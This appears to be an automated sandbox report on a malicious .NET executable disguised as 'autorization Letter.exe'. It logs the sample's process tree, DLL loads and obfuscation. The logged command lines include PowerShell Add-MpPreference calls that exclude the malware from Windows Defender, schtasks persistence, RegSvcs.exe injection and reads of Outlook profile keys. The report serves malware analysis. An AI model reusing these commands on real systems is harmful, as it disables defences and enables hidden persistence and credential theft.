                      Source: autorization Letter.exe | ReversingLabs: Detection: 57%
                      Source: C:\Users\user\Desktop\autorization Letter.exe | File read: C:\Users\user\Desktop\autorization Letter.exe
                      Source: unknown | Process created: C:\Users\user\Desktop\autorization Letter.exe "C:\Users\user\Desktop\autorization Letter.exe"
                      Source: C:\Users\user\Desktop\autorization Letter.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\autorization Letter.exe"
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\autorization Letter.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\tIFjYTCo.exe"
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\autorization Letter.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tIFjYTCo" /XML "C:\Users\user\AppData\Local\Temp\tmpF639.tmp"
                      Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\autorization Letter.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                      Source: unknown | Process created: C:\Users\user\AppData\Roaming\tIFjYTCo.exe C:\Users\user\AppData\Roaming\tIFjYTCo.exe
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                      Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tIFjYTCo" /XML "C:\Users\user\AppData\Local\Temp\tmp1162.tmp"
                      Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                      Source: unknown | Process created: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe "C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe"
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: unknown | Process created: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe "C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe"
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\autorization Letter.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\autorization Letter.exe"
                      Source: C:\Users\user\Desktop\autorization Letter.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\tIFjYTCo.exe"
                      Source: C:\Users\user\Desktop\autorization Letter.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tIFjYTCo" /XML "C:\Users\user\AppData\Local\Temp\tmpF639.tmp"
                      Source: C:\Users\user\Desktop\autorization Letter.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                      Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tIFjYTCo" /XML "C:\Users\user\AppData\Local\Temp\tmp1162.tmp"
                      Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                      Source: C:\Users\user\Desktop\autorization Letter.exe | Section loaded: mscoree.dll
                      Source: C:\Users\user\Desktop\autorization Letter.exe | Section loaded: apphelp.dll
                      Source: C:\Users\user\Desktop\autorization Letter.exe | Section loaded: kernel.appcore.dll
                      Source: C:\Users\user\Desktop\autorization Letter.exe | Section loaded: version.dll
                      Source: C:\Users\user\Desktop\autorization Letter.exe | Section loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\Desktop\autorization Letter.exe | Section loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\Desktop\autorization Letter.exe | Section loaded: uxtheme.dll
                      Source: C:\Users\user\Desktop\autorization Letter.exe | Section loaded: windows.storage.dll
                      Source: C:\Users\user\Desktop\autorization Letter.exe | Section loaded: wldp.dll
                      Source: C:\Users\user\Desktop\autorization Letter.exe | Section loaded: profapi.dll
                      Source: C:\Users\user\Desktop\autorization Letter.exe | Section loaded: cryptsp.dll
                      Source: C:\Users\user\Desktop\autorization Letter.exe | Section loaded: rsaenh.dll
                      Source: C:\Users\user\Desktop\autorization Letter.exe | Section loaded: cryptbase.dll
                      Source: C:\Users\user\Desktop\autorization Letter.exe | Section loaded: dwrite.dll
                      Source: C:\Users\user\Desktop\autorization Letter.exe | Section loaded: windowscodecs.dll
                      Source: C:\Users\user\Desktop\autorization Letter.exe | Section loaded: amsi.dll
                      Source: C:\Users\user\Desktop\autorization Letter.exe | Section loaded: userenv.dll
                      Source: C:\Users\user\Desktop\autorization Letter.exe | Section loaded: msasn1.dll
                      Source: C:\Users\user\Desktop\autorization Letter.exe | Section loaded: gpapi.dll
                      Source: C:\Users\user\Desktop\autorization Letter.exe | Section loaded: propsys.dll
                      Source: C:\Users\user\Desktop\autorization Letter.exe | Section loaded: edputil.dll
                      Source: C:\Users\user\Desktop\autorization Letter.exe | Section loaded: urlmon.dll
                      Source: C:\Users\user\Desktop\autorization Letter.exe | Section loaded: iertutil.dll
                      Source: C:\Users\user\Desktop\autorization Letter.exe | Section loaded: srvcli.dll
                      Source: C:\Users\user\Desktop\autorization Letter.exe | Section loaded: netutils.dll
                      Source: C:\Users\user\Desktop\autorization Letter.exe | Section loaded: windows.staterepositoryps.dll
                      Source: C:\Users\user\Desktop\autorization Letter.exe | Section loaded: sspicli.dll
                      Source: C:\Users\user\Desktop\autorization Letter.exe | Section loaded: wintypes.dll
                      Source: C:\Users\user\Desktop\autorization Letter.exe | Section loaded: appresolver.dll
                      Source: C:\Users\user\Desktop\autorization Letter.exe | Section loaded: bcp47langs.dll
                      Source: C:\Users\user\Desktop\autorization Letter.exe | Section loaded: slc.dll
                      Source: C:\Users\user\Desktop\autorization Letter.exe | Section loaded: sppc.dll
                      Source: C:\Users\user\Desktop\autorization Letter.exe | Section loaded: onecorecommonproxystub.dll
                      Source: C:\Users\user\Desktop\autorization Letter.exe | Section loaded: onecoreuapcommonproxystub.dll
                      Source: C:\Users\user\Desktop\autorization Letter.exe | Section loaded: ntmarta.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
                      Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: kernel.appcore.dll
                      Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: taskschd.dll
                      Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exe | Section loaded: mscoree.dll
                      Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exe | Section loaded: apphelp.dll
                      Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exe | Section loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exe | Section loaded: version.dll
                      Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exe | Section loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exe | Section loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exe | Section loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exe | Section loaded: uxtheme.dll
                      Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exe | Section loaded: windows.storage.dll
                      Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exe | Section loaded: wldp.dll
                      Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exe | Section loaded: profapi.dll
                      Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exe | Section loaded: cryptsp.dll
                      Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exe | Section loaded: rsaenh.dll
                      Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exe | Section loaded: cryptbase.dll
                      Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exe | Section loaded: dwrite.dll
                      Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exe | Section loaded: windowscodecs.dll
                      Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exe | Section loaded: amsi.dll
                      Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exe | Section loaded: userenv.dll
                      Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exe | Section loaded: msasn1.dll
                      Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exe | Section loaded: gpapi.dll
                      Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exe | Section loaded: propsys.dll
                      Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exe | Section loaded: edputil.dll
                      Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exe | Section loaded: urlmon.dll
                      Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exe | Section loaded: iertutil.dll
                      Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exe | Section loaded: srvcli.dll
                      Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exe | Section loaded: netutils.dll
                      Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exe | Section loaded: windows.staterepositoryps.dll
                      Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exe | Section loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exe | Section loaded: wintypes.dll
                      Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exe | Section loaded: appresolver.dll
                      Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exe | Section loaded: bcp47langs.dll
                      Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exe | Section loaded: slc.dll
                      Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exe | Section loaded: sppc.dll
                      Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exe | Section loaded: onecorecommonproxystub.dll
                      Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exe | Section loaded: onecoreuapcommonproxystub.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: fastprox.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: ncobjapi.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wbemcomn.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wbemcomn.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: mpclient.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: userenv.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: version.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: msasn1.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wmitomi.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: mi.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: miutils.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: miutils.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: gpapi.dll
                      Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: kernel.appcore.dll
                      Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: taskschd.dll
                      Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe | Section loaded: mscoree.dll
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe | Section loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe | Section loaded: version.dll
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe | Section loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe | Section loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe | Section loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe | Section loaded: mscoree.dll
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe | Section loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe | Section loaded: version.dll
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe | Section loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe | Section loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe | Section loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\Desktop\autorization Letter.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                      Source: Window Recorder | Window detected: More than 3 window changes detected
                      Source: C:\Users\user\Desktop\autorization Letter.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles
                      Source: autorization Letter.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: autorization Letter.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: autorization Letter.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: PkJS.pdb source: autorization Letter.exe, tIFjYTCo.exe.1.dr
                      Source: Binary string: PkJS.pdbSHA256a source: autorization Letter.exe, tIFjYTCo.exe.1.dr
                      Source: Binary string: RegSvcs.pdb, source: GUIVTme.exe, 00000010.00000000.2249012079.0000000000902000.00000002.00000001.01000000.0000000D.sdmp, GUIVTme.exe.9.dr
                      Source: Binary string: RegSvcs.pdb source: GUIVTme.exe, 00000010.00000000.2249012079.0000000000902000.00000002.00000001.01000000.0000000D.sdmp, GUIVTme.exe.9.dr

                      Data Obfuscation

Source: autorization Letter.exe, Form1.cs | .Net Code: InitializeComponent
Source: tIFjYTCo.exe.1.dr, Form1.cs | .Net Code: InitializeComponent
Source: 1.2.autorization Letter.exe.5a60000.4.raw.unpack, QBy45BY4uMbUQs88Qq.cs | .Net Code: KmDc5Q9bs System.Reflection.Assembly.Load(byte[])
Source: 1.2.autorization Letter.exe.7860000.5.raw.unpack, poU46SQrMKhRY6KoAP.cs | .Net Code: FN6kAlCTUA System.Reflection.Assembly.Load(byte[])
Source: 1.2.autorization Letter.exe.34598c4.0.raw.unpack, QBy45BY4uMbUQs88Qq.cs | .Net Code: KmDc5Q9bs System.Reflection.Assembly.Load(byte[])
Source: 1.2.autorization Letter.exe.46b0be0.3.raw.unpack, poU46SQrMKhRY6KoAP.cs | .Net Code: FN6kAlCTUA System.Reflection.Assembly.Load(byte[])
Source: 10.2.tIFjYTCo.exe.27098b4.0.raw.unpack, QBy45BY4uMbUQs88Qq.cs | .Net Code: KmDc5Q9bs System.Reflection.Assembly.Load(byte[])
Source: autorization Letter.exe | Static PE information: 0x8BCF3D3C [Sat Apr 30 07:37:32 2044 UTC]
Source: C:\Users\user\Desktop\autorization Letter.exe | Code function: 1_2_016BEE10 pushfd ; iretd 1_2_016BEE11
Source: C:\Users\user\Desktop\autorization Letter.exe | Code function: 1_2_058AC590 push eax; ret 1_2_058AC5A3
Source: C:\Users\user\Desktop\autorization Letter.exe | Code function: 1_2_058AC549 push eax; ret 1_2_058AC5A3
Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exe | Code function: 10_2_00D0EE10 pushfd ; iretd 10_2_00D0EE11
Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exe | Code function: 10_2_04CEC549 push eax; ret 10_2_04CEC5A3
Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exe | Code function: 10_2_04CEC57F push eax; ret 10_2_04CEC5A3
Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exe | Code function: 10_2_04CE6600 pushad ; iretd 10_2_04CE660A
Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exe | Code function: 10_2_04CE77E1 push edi; iretd 10_2_04CE77EE
Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exe | Code function: 10_2_04CEC218 pushfd ; iretd 10_2_04CEC225
Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exe | Code function: 10_2_04CEB349 pushad ; iretd 10_2_04CEB355
Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exe | Code function: 10_2_04CE18C0 push es; iretd 10_2_04CE18CA
Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exe | Code function: 10_2_04CE8925 pushad ; iretd 10_2_04CE892E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_05E9A349 push 8B038899h; iretd 14_2_05E9A34E
Source: autorization Letter.exe | Static PE information: section name: .text entropy: 7.850552008247241
Source: tIFjYTCo.exe.1.dr | Static PE information: section name: .text entropy: 7.850552008247241
Source: 1.2.autorization Letter.exe.5a60000.4.raw.unpack, kD0JNdgNBriBGn5egS.cs | High entropy of concatenated method names: 'ubU6vJppswKkZ', 'uvAmfDYbimWPg9rmyH6', 'XHYItoYHo1DoUvgeuNZ', 'tYVkNWYXlYIi7gDFfLn', 'TV4H82YzoL7kT86loIA', 'yoiEG7M3KqRFDlQAaqW', 'rU4RpWYS77WPQpUZwKR', 'vGvSIFYGEhSitdykOPg', 'TCSl6vMYjB5c5h75h4u'
Source: 1.2.autorization Letter.exe.5a60000.4.raw.unpack, QBy45BY4uMbUQs88Qq.cs | High entropy of concatenated method names: 'QByY45B4u', 'EbUNQs88Q', 'D8PguGCCm', 'gfwtorebq', 'rQ9oD0JNd', 'cBrXiBGn5', 'sgS08fT72', 'lmAQKmrG6', 'qn1mTNvNO', 'K084ZL4CG'
Source: 1.2.autorization Letter.exe.7860000.5.raw.unpack, yxVmJLNMxItFD4gtlw.cs | High entropy of concatenated method names: 'LJggpU5HQm', 'G0igWpPIdo', 'fT4g6lCPHe', 'FhegRtDhGW', 'JjMg5nycZT', 'NtNgtXnF6s', 'qVugnLKtVv', 'U8CgErDyj8', 'bsqgiXf53X', 'PKegHqfQOH'
Source: 1.2.autorization Letter.exe.7860000.5.raw.unpack, Eqhytk7pjoST4sg0KT.cs | High entropy of concatenated method names: 'dw4baUeBSV', 'cdWbS7FcUb', 'OsIbkJwNOW', 'dSrbTJfcN0', 'XZ5b8FoXu6', 'bHSb23hhRF', 'FldbULRDY0', 'RxgjmXvJhN', 'pP8jrbBxDW', 'ILJjxZFoOf'
Source: 1.2.autorization Letter.exe.7860000.5.raw.unpack, YpTWJpZyAmNmFD026j.cs | High entropy of concatenated method names: 'C3VaZ4pBUS', 'dGgaMMjZy9', 'k5HaLIu74j', 'TugaB9TBP6', 'JU2ag5BGI8', 'TCRaFZtKKG', 'M55VlCUlsEkAvTCDN2', 'vRR09m5KbNajnMMu7M', 'JUBaa5srRO', 'OvsaSso6Hd'
Source: 1.2.autorization Letter.exe.7860000.5.raw.unpack, Ew9Mhe1NCjRAdHx3lS.cs | High entropy of concatenated method names: 'ToString', 'rcAFGBPVa2', 'RBFF5dZJxy', 'XHHFtG5hQU', 'rrmFnbcnjy', 'wvVFEv8wsX', 'JsQFicDayf', 'OKpFHuRXsb', 'vsEFhbW3ox', 'kJ8F3MUUMP'
Source: 1.2.autorization Letter.exe.7860000.5.raw.unpack, iPyZ94TiRa2ebZuHpM.cs | High entropy of concatenated method names: 'kiFZPRI11W', 'ICjZys9s0B', 'AhbZABqTRw', 'bmjZw6IYYQ', 'iq4ZVTwxQa', 'i5KZfJqFcI', 'qu8ZYAbQXD', 'lQIZOwPUtM', 'k96Z0kVbw5', 'DknZNKmMkm'
Source: 1.2.autorization Letter.exe.7860000.5.raw.unpack, md29wrV9kisHjHUXvF.cs | High entropy of concatenated method names: 'X45orGoWqu', 'BsWo1TWg9b', 'mG8j7cMn5r', 'NUajaNAsxq', 'YLooGKXZoR', 'Pn1oWngO8c', 'BNaoIBjKjA', 'vL3o6k42EV', 'o6qoRAA5FM', 'PJQoXO4TZx'
Source: 1.2.autorization Letter.exe.7860000.5.raw.unpack, poU46SQrMKhRY6KoAP.cs | High entropy of concatenated method names: 'bWCSJCf7q9', 'cv6ST6TB7b', 'S0rS8RjYrE', 'W2eSsD7Br1', 'LwvS2ykFr2', 'LifSUNu6is', 'RD9SZLx8Qm', 'kYvSMlmx4L', 'B7gSeaoive', 'IvUSLwsrH2'
